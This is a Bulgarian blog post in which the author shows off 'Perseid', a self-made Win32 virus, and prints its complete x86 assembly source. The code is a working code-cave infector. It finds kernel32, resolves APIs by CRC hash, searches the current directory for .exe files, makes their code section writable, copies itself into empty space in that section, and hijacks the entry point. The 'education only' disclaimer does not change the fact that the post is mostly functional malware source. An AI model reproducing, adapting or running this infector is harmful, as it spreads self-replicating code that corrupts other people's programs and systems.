Това е едно мое творение вирус което заразява всички файлове в директорията но само при условие че имат достатачно сбоводно място в секцията с кода за да запише себеси там :) Написах го само за 2-3 дена и го кръстих Perseid защото точно в деня когато го завърших прокрай земята минаваше голям поток от падащи звезди... наречени Perseid :)
; BlindWolf / Hack 3D
;
;I made this virii just for education purpouse and just to learn someting
;Credits goes to fAMINE, i learnet many things from his sources.
;This is simple Win32 Code cave infector.Main executable should have system
;attributes and writable code section.Use CRC instead of API names, keep API addresses
;on the stack.Infect only one executable in the current directoy per exectuion.
;Size of the virii is 460 bytes.I still havent added payload.Its no really optimized but it works fine
;for education purpouse :) .
.686p
.mmx
.MODEL flat,stdcall
OPTION CASEMAP:NONE
Include windows.inc
include kernel32.inc
includelib kernel32.lib
assume fs:FLAT
.code
db 0FFh
Beginning label near
FileName db "*.exe",0
realstart:
call getDelta ;Get the delta
getDelta:
pop ebp
sub ebp,offset getDelta
;Entry Point
mov esi,dword ptr[EntryPoint+ebp]
mov dword ptr[GoToOEP+ebp+1],esi
pop esi
and esi,0FFFF0000h
call GetKernel
mov edx,7h
push 0BD01EEDEh ;CRC for FlushViewOfFile
push 53F2D79Bh ;CRC for MapViewOfFileA
push 1EF99B0Dh ;CRC for CreateFileMappingA
push 02BD833FBh ;CRC for CreateFileA
push 0F2290C25h ;CRC for SetFileAttributesA
push 0A38B216Eh ;CRC for FindNextFileA
push 0903ebb2eh ;CRC for FindFirstFileA
GetOneMoreApi:
pop ebx
push edx
call GetApis
pop edx
mov dword ptr[esp+4*6],ecx
dec edx
jnz GetOneMoreApi
;ESP-13C = WIN32_FIND_DATA
pop ecx ;Poping FindFirstFile
sub esp,13Ch
push esp
lea eax,[FileName+ebp]
push eax
call ecx ;call FindFirstFileA
mov esi,eax ;save the handle
test byte ptr[esp],(FILE_ATTRIBUTE_SYSTEM + FILE_ATTRIBUTE_DIRECTORY)
jz Continue
FindOneMore:
mov edi,dword ptr[esp+13Ch] ;get FindNextFile address
subloop:
push esp
push esi
call edi ;calling FindNextFileA
test al,al
jz BackToEP
test byte ptr[esp],(FILE_ATTRIBUTE_SYSTEM + FILE_ATTRIBUTE_DIRECTORY)
jnz subloop
Continue:
add esp,13Ch
pop edi ;poping FindNextFile address (clean the stack)
pop eax
sub esp,13Ch
lea ebx,[esp+2Ch]
push FILE_ATTRIBUTE_SYSTEM
push ebx
call eax ;call SetFileAttributes
xor edi,edi ;EDI will be zero
add esp,13Ch
pop eax ;pop the CreateFileA address
push edi
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push edi
push edi
push GENERIC_ALL
push ebx
call eax ;call Create FileA
pop ebx ;pop CreateFileMappingA address
push edi
push edi
push edi
push PAGE_READWRITE
push edi
push eax
call ebx ;call CreateFileMappingA
pop edx ;pop MapViewOfFile address
push edi
push edi
push edi
push FILE_MAP_ALL_ACCESS
push eax
call edx ;call MapViewOfFile
xor ecx,ecx
mov edi,eax
add eax,dword ptr[eax+3Ch]
mov edx,dword ptr[eax+28h] ;get EntryPoint
add edx,dword ptr[eax+34h] ;add imagebase
mov [EntryPoint+ebp],edx
mov dword ptr[eax+11Ch],0E0000020h ;change .text section properities to writable
xor ebx,ebx
add edi,dword ptr[eax+54h] ;SizeOfHeaders
dec edi
TryToWrite:
inc edi
inc ecx
cmp ecx,TheEnd - Beginning
je Write
cmp dword ptr[edi],0
je TryToWrite
add ebx,ecx
cmp ebx,dword ptr[eax+108h]
jge Finish
xor ecx,ecx
jmp TryToWrite
Write:
sub edi,ecx
push edi
;calculate the New EP
push eax
sub edi,dword ptr[eax+54h]
and eax,0FFFFFF00h
sub edi,eax ;maping address
add edi,6h ;cuz of the *.exe and magic jump
pop eax
add edi,dword ptr[eax+104h] ;add section virtual size
mov dword ptr[eax+28h],edi ;WriteNewEp
pop edi
lea esi,[ebp+Beginning]
WriteLoop:
lodsb
stosb
loopd WriteLoop
sub eax,0C3h
pop ecx ;poping FlushViewOfFile address
push 0
push eax
call ecx
Finish:
nop
BackToEP:
cmp byte ptr[Beginning-1+ebp],0FFh
je Droper
GoToOEP:
push 00001111
ret
EntryPoint dd 00000000
GetKernel proc ;This procedure returns image base of the kernel32.dll (ESI ) and address of kernel32 export table (EDI)
tryagain:
cmp word ptr[esi],'ZM'
jnz tryitman
mov edi,dword ptr[esi+3Ch] ;magic jump
mov edi,dword ptr[esi+edi+78h] ;address of export table
add edi,esi ;normalize offset
Ret
tryitman:
sub esi,1000h
jmp tryagain
GetKernel EndP
GetApis proc ;This procedure takes 4 arguments 1: EAX = 0 , 2:ESI = Imagebase , 3:EDI = export table address , 4:EBX == CRC for the name of the API
push edi
push esi
mov ecx,[edi+18h]
mov edx,[edi+20h]
add edx,esi
push ecx
push esi
push edi
mov edi,esi
mov esi,[edx]
add esi,edi
lol:
xor edi,edi
loop1:
lodsb
mov ecx,eax
add edi,eax
rol edi,cl
test eax,eax
jne loop1
cmp edi,ebx
je found
dec dword ptr[esp+08h]
jne lol
found:
pop ebx
pop eax
pop ecx
mov edx,[ebx+18h]
mov edi,[ebx+24h]
add edi,eax
sub edx,ecx
shl edx,1
add edi,edx
movzx edx,word ptr[edi]
mov ebx,[ebx+1ch]
add ebx,eax
shl edx,2
add ebx,edx
xor ecx,ecx
add ecx,[ebx]
add ecx,eax
xor eax,eax
pop esi
pop edi
Rets
GetApis EndP ;This procedure return ECX = address of the desired API
TheEnd label near
Droper:
push 0
call ExitProcess
end realstart
Няма коментари:
Публикуване на коментар